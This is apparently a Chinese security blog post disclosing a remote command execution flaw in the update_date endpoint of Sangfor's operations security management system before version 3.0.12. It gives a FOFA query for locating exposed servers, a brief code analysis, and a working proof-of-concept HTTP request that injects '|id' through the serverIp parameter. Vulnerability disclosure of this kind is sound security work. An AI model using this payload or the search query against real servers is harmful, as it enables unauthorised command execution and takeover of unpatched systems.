深信服运维安全管理系统 update_date 远程命令执行漏洞


漏洞简介

深信服运维安全管理系统 update_date 接口存在远程命令执行漏洞。攻击者可通过构造恶意的请求,利用该漏洞在目标服务器上执行任意命令,从而可能导致服务器被完全控制、敏感数据泄露等严重后果。影响范围包括所有运行存在该漏洞版本的深信服运维安全管理系统的服务器。

影响版本

低于 3.0.12 20241106

fofa语法

body="/fort/login" && header="FORTSESSIONID"

漏洞分析

看下

com.sbr.fort.web.controller.system.relatedServices.NtpController#updateTime的实现逻辑

  • 方法通过 this.getParameter("serverIp") 获取名为 serverIp 的 HTTP 请求参数,该参数用户可控。
  • 获取的 serverIp 参数在经过简单的长度检查后,被直接拼接到 executor.exe() 方法执行的系统命令中。
  • 代码中 serverIp.length() > 140 的长度限制同样无法作为有效的安全措施。

漏洞复现

POC

POST /fort/timeSet;help/update_date HTTP/1.1
Host: sangfor_osm.mrxn.net
Content-Type: application/x-www-form-urlencoded

serverIp=|id

成功得到命令执行结果。


手机扫码阅读

深信服运维安全管理系统 upload_CN 远程命令执行漏洞

深信服运维安全管理系统 generate_certificate 远程命令执行漏洞

评 论
avatar
sanfor的底裤都被你扒完了^_^
6 个月前 回复
avatar
Mrxn
@peacesh4wn:还好 新版修了
6 个月前 回复